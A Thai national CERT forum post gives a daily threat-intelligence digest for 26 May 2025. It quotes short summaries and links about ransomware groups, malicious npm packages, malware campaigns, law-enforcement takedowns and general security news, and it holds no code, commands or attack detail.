NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ

    Cyber Threat Intelligence 26 May 2025

    Cyber Security News
    1
    1
    631
    โหลดโพสเพิ่มเติม
    • เก่าสุดไปยังใหม่สุด
    • ใหม่สุดไปยังเก่าสุด
    • Most Votes
    ตอบ
    • ตอบโดยตั้งกระทู้ใหม่
    เข้าสู่ระบบเพื่อตอบกลับ
    Topic นี้ถูกลบไปแล้ว เฉพาะผู้ใช้งานที่มีสิทธิ์ในการจัดการ Topic เท่านั้นที่จะมีสิทธิ์ในการเข้าชม
    • NCSA_THAICERTN
      NCSA_THAICERT
      แก้ไขล่าสุดโดย

      Malware

      • DragonForce Targets Rivals In a Play For Dominance
        "DragonForce is not just another ransomware brand – it’s a destabilizing force trying to reshape the ransomware landscape. Counter Threat Unit (CTU) researchers are actively tracking the evolution of the threat posed by the group. DragonForce is involved in high-impact attacks targeting both traditional IT infrastructure and virtualized environments (e.g., VMware ESXi), with a strong emphasis on credential theft, Active Directory abuse, and data exfiltration. In March 2025, it launched efforts to claim dominance in the ransomware ecosystem by introducing a more flexible affiliate model and targeting other ransomware groups."
        https://news.sophos.com/en-us/2025/05/21/dragonforce-targets-rivals-in-a-play-for-dominance/
        https://www.infosecurity-magazine.com/news/dragonforce-turf-war-ransomware/
      • 60 Malicious Npm Packages Leak Network And Host Data In Active Malware Campaign
        "Socket’s Threat Research Team has uncovered an active campaign in the npm ecosystem that now spans 60 packages published under three npm accounts. Each package carries a small install‑time script that, when triggered during npm install, collects hostnames, internal and external IP addresses, DNS server lists, and user directory paths, then exfiltrates the data to a Discord webhook under the threat actor’s control."
        https://socket.dev/blog/60-malicious-npm-packages-leak-network-and-host-data
        https://www.bleepingcomputer.com/news/security/dozens-of-malicious-packages-on-npm-collect-host-and-network-data/
        https://www.bankinfosecurity.com/reconnaissance-campaign-active-on-npm-repository-a-28475
      • FBI Warns Of Luna Moth Extortion Attacks Targeting Law Firms
        "The FBI warned that an extortion gang known as the Silent Ransom Group has been targeting U.S. law firms over the last two years in callback phishing and social engineering attacks. Also known as Luna Moth, Chatty Spider, and UNC3753, this threat group has been active since 2022 and was also behind BazarCall campaigns that provided initial access to corporate networks for Ryuk and Conti ransomware attacks. In March 2022, following Conti's shutdown, the threat actors separated from the cybercrime syndicate and formed their own operation called Silent Ransom Group (SRG)."
        https://www.bleepingcomputer.com/news/security/fbi-warns-of-luna-moth-extortion-attacks-targeting-law-firms/
        https://www.ic3.gov/CSA/2025/250523.pdf
        https://securityaffairs.com/178239/malware/silent-ransom-group-targeting-law-firms-the-fbi-warns.html
        https://hackread.com/fbi-silent-ransom-group-law-firms-via-scam-calls/
      • ViciousTrap – Infiltrate, Control, Lure: Turning Edge Devices Into Honeypots En Masse.
        "In a previous blogpost, Sekoia’s Threat Detection & Research (TDR) team documented the exploitation of the CVE-2023-20118 vulnerability, which was used to deploy two distinct threats: a webshell and the PolarEdge malware. Through the observation of activity on our honeypots, it was possible to identify a third actor, nicknamed ViciousTrap by Sekoia.io, using the same vulnerability. The infection chain involves the execution of a shell script, dubbed NetGhost, which redirects incoming traffic from specific ports of the compromised router to a honeypot-like infrastructure under the attacker’s control allowing him to intercept network flows."
        https://blog.sekoia.io/vicioustrap-infiltrate-control-lure-turning-edge-devices-into-honeypots-en-masse/
        https://thehackernews.com/2025/05/vicioustrap-uses-cisco-flaw-to-build.html
      • Joint Analysis By AhnLab And NCSC On TA-ShadowCricket: Emerging Malware Trends And IRC Server Tracking
        "Since November 2024, AhnLab has been working with the NCSC to analyze the malicious IRC server and related malware to classify the unidentified threat actor as Larva-24013 and trace their activities, and has confirmed their association with the Shadow Force group. AhnLab manages malicious activities in four stages through the “Threat Actor Naming and Taxonomy,” classifying threat actors as “Larva” (unidentified threat actors) and “Arthropod” (identified threat actors). Following AhnLab’s threat actor taxonomy and naming convention, the threat actor has been identified and named TA-ShadowCricket."
        https://asec.ahnlab.com/en/88137/
      • Case Of Larva-25004 Group (Related To Kimsuky) Exploiting Additional Certificate – Malware Signed With Nexaweb Certificate
        "AhnLab SEcurity intelligence Center (ASEC) has discovered malware signed with the certification of Nexaweb Inc. by investigating a file with the same characteristics as the one signed with a Korean company’s certificate. These malware samples have been reported by other security companies about the activities of the Kimsuky group."
        https://asec.ahnlab.com/en/88132/
      • Information Leakage Caused By DB Client Tool
        "In recent breach incidents, threat actors have been observed not only accessing systems, but also directly querying internal databases and stealing sensitive information. Particularly, more threat actors are installing DB client tools directly on targeted systems to exfiltrate data, and legitimate tools such as DBeaver, Navicat, and sqlcmd are being used in this process."
        https://asec.ahnlab.com/en/88134/
      • NSIS Abuse And sRDI Shellcode: Anatomy Of The Winos 4.0 Campaign
        "Rapid7 has been tracking a malware campaign that uses fake software installers disguised as popular apps like VPN and QQBrowser—to deliver Winos v4.0, a hard-to-detect malware that runs entirely in memory and gives attackers remote access. The campaign was first spotted during a February 2025 MDR investigation. Since then, we’ve seen more samples using the same infection method—a multi-layered setup we call the Catena loader. Catena uses embedded shellcode and configuration switching logic to stage payloads like Winos v4.0 entirely in memory, evading traditional antivirus tools."
        https://www.rapid7.com/blog/post/2025/05/22/nsis-abuse-and-srdi-shellcode-anatomy-of-the-winos-4-0-campaign/
        https://thehackernews.com/2025/05/hackers-use-fake-vpn-and-browser-nsis.html
      • Fake Zenmap. WinMRT Sites Target IT Staff With Bumblebee Malware
        "The Bumblebee malware SEO poisoning campaign uncovered earlier this week aimpersonating RVTools is using more typosquatting domainsi mimicking other popular open-source projects to infect devices used by IT staff. BleepingComputer was able to find two cases leveraging the notoriety of Zenmap, the GUI for the Nmap network scanning tool, and the WinMTR tracerout utility. Both of these tools are commonly used by IT staff to diagnose or analyze network traffic, requiring administrative privileges for some of the features to work This makes users of these tools prime targets for threat actors looking to breach corporate networks and spread laterally to other devices."
        https://www.bleepingcomputer.com/news/security/bumblebee-malware-distributed-via-zenmap-winmrt-seo-poisoning/
      • Mysterious Hacking Group Careto Was Run By The Spanish Government, Sources Say
        "More than a decade ago, researchers at antivirus company Kaspersky identified suspicious internet traffic of what they thought was a known government-backed group, based on similar targeting and its phishing techniques. Soon, the researchers realized they had found a much more advanced hacking operation that was targeting the Cuban government, among others. Eventually the researchers were able to attribute the network activity to a mysterious — and at the time completely unknown — Spanish-speaking hacking group that they called Careto, after the Spanish slang word (“ugly face” or “mask” in English), which they found buried within the malware’s code."
        https://techcrunch.com/2025/05/23/mysterious-hacking-group-careto-was-run-by-the-spanish-government-sources-say/

      General News

      • Recalibrating Risk In The Age Of AI
        "Artificial intelligence is transforming the enterprise landscape, with organizations reporting a 17% jump in cyber breaches over the past year and 55% experiencing attacks. Security teams struggle with visibility gaps while adversaries weaponize AI to strike harder and faster, according to the Gigamon 2025 Hybrid Cloud Security Survey. AI is exposing critical security weaknesses faster than most organizations can respond, the survey says. With global AI investment expected to grow beyond $200 billion in 2025 and reach $750 billion by 2028, security leaders must recalibrate how they define, measure and mitigate risk in this new era."
        https://www.bankinfosecurity.com/blogs/recalibrating-risk-in-age-ai-p-3874
        https://www.gigamon.com/campaigns/hybrid-cloud-security-survey.html
      • Token Security Unveils MCP Server For Non-Human Identity Security
        "Token Security launched Model Context Protocol (MCP) Server for non-human identity (NHI). This capability brings the power of agentic AI to modern security operations and enables teams to interact with complex NHI data using simple, natural language. The Token MCP Server leverages the open-standard Model Context Protocol to bridge large language models (LLMs) with enterprise identity data, delivering intelligent insights and guided remediation through a conversational interface."
        https://www.helpnetsecurity.com/2025/05/23/token-security-token-mcp-server/
      • Is Privacy Becoming a Luxury? A Candid Look At Consumer Data Use
        "In this Help Net Security interview, Dr. Joy Wu, Assistant Professor, UBC Sauder School of Business, discusses the psychological and societal impacts of data monetization, why current privacy disclosures often fall short, and what it will take to create a more equitable data ecosystem. From the limits of transparency to the potential for privacy to become a luxury, Wu offers a candid assessment of where we are, and where we’re headed."
        https://www.helpnetsecurity.com/2025/05/23/joy-wu-ubc-sauder-school-of-business-privacy-luxury/
      • Outsourcing Cybersecurity: How SMBs Can Make Smart Moves
        "Outsourcing cybersecurity can be a practical and affordable option. It allows small businesses to get the protection they need without straining their budgets, freeing up time and resources to focus on core operations. 76% of SMBs lack the in-house skills to properly address security issues, increasing demand for the expertise and services of MSPs, and 78% are concerned that a severe cyberattack could drive them out of operation, according to ConnectWise."
        https://www.helpnetsecurity.com/2025/05/23/smbs-outsourcing-cybersecurity/
      • Digital Trust Is Cracking Under The Pressure Of Deepfakes, Cybercrime
        "69% of global respondents to a Jumio survey say AI-powered fraud now poses a greater threat to personal security than traditional forms of identity theft. This number rises to 74% in Singapore, with 71% also indicating that AI-generated scams are harder to detect than traditional scams."
        https://www.helpnetsecurity.com/2025/05/23/ai-powered-fraud-threat/
      • Shift Left Strategy Creates Heavy Burden For Developers
        "While 47% of organizations claim to have implemented shift left security strategies, many still struggle with execution gaps and security inefficiencies, according to Pynt. Of those who haven’t implemented shift left, half of them have no plans to do so at all. Since shift left security was introduced, companies have been trying to live up to its promise: identifying and addressing security issues earlier in the software development lifecycle, ideally before code ever reaches production."
        https://www.helpnetsecurity.com/2025/05/23/shift-left-security-strategies/
      • Scarcity Signals: Are Rare Activities Red Flags?
        "Cisco Talos reviewed six months of network connection telemetry logs spanning June 1, 2024 – Dec. 31, 2024, containing 3,220,829 log events and 742 unique base domains, to explore if domains that PowerShell rarely contacts are more likely to be malicious. Key findings reveal that the odds of a rare domain being malicious were 3.18 times higher than for frequently contacted domains (95% CI: 0.39–25.9), suggesting a trend towards higher risk in rare domains."
        https://blog.talosintelligence.com/scarcity-signals-are-rare-activities-red-flags/
      • 3 Critical Pillars Of Cyber-Resilience
        "A single ransomware attack can wreak havoc in the blink of an eye. The Change Healthcare incident, for example, left millions of patients without prescription access, delaying life-saving treatments. With over 100 million patient records leaked, the long tail of ransomware damage is apparent. In fact, a deeper analysis of the attack found that nearly 23% of healthcare businesses with more than $100 million in revenue experienced downstream impacts, as did 11% of those with revenues of $25 million to $100 million."
        https://www.darkreading.com/cyber-risk/three-critical-pillars-of-cyber-resilience
      • Rethinking Data Privacy In The Age Of Generative AI
        "The rise of generative artificial intelligence (GenAI) has reshaped the conversation around data privacy, sparking concerns about how personal and organizational data is used, stored, and protected. Large language models (LLMs) are trained on vast datasets scraped from the Internet. This has triggered an urgent debate about whether individuals and businesses are aware of how their data is being used. As a result, many are questioning if existing copyright and privacy laws should be updated to reflect this new era."
        https://www.darkreading.com/cyber-risk/rethinking-data-privacy-age-generative-ai
      • Operation ENDGAME Strikes Again: The Ransomware Kill Chain Broken At Its Source
        "Cybercriminals around the world have suffered a major disruption after law enforcement and judicial authorities, coordinated by Europol and Eurojust, dismantled key infrastructure behind the malware used to launch ransomware attacks. From 19 to 22 May, authorities took down some 300 servers worldwide, neutralised 650 domains, and issued international arrest warrants against 20 targets, dealing a direct blow to the ransomware kill chain."
        https://www.europol.europa.eu/media-press/newsroom/news/operation-endgame-strikes-again-ransomware-kill-chain-broken-its-source
        https://thehackernews.com/2025/05/300-servers-and-35m-seized-as-europol.html
        https://therecord.media/hackers-charged-infrastructure-dismantled-operation-endgame
        https://cyberscoop.com/operation-endgame-ransomware-infrastructure-takedown-europol/
        https://www.infosecurity-magazine.com/news/law-enforcement-initial-access/
        https://www.helpnetsecurity.com/2025/05/23/operation-endgame-danabot-botnet-disrupted-qakbot-leader-indicted/
        https://www.bankinfosecurity.com/initial-access-brokers-targeted-in-operation-endgame-20-a-28476
        https://securityaffairs.com/178245/cyber-crime/operation-endgame-disrupted-global-ransomware-infrastructure.html
      • Cybercrime Is 'orders Of Magnitude' Larger Than State-Backed Ops, Says Ex-White House Advisor
        "Uncle Sam's cybersecurity apparatus can't only focus on China and other nation-state actors, but also has to fight the much bigger damage from plain old cybercrime, says former White House advisor Michael Daniel. And the Trump administration's steep cuts to federal government staff are making that a lot harder. Daniel currently leads the Cyber Threat Alliance, a nonprofit threat-intel-sharing organization. Before he took that role, he served as special assistant to President Obama and cybersecurity coordinator on the National Security Council staff between 2012 and 2017."
        https://www.theregister.com/2025/05/24/cyber_crime_bigger_than_nation_state/

      อ้างอิง
      Electronic Transactions Development Agency(ETDA) 012ffa35-7a47-4187-ba93-dbd12d05c945-image.png

      1 การตอบกลับ คำตอบล่าสุด ตอบ คำอ้างอิง 0
      • First post
        Last post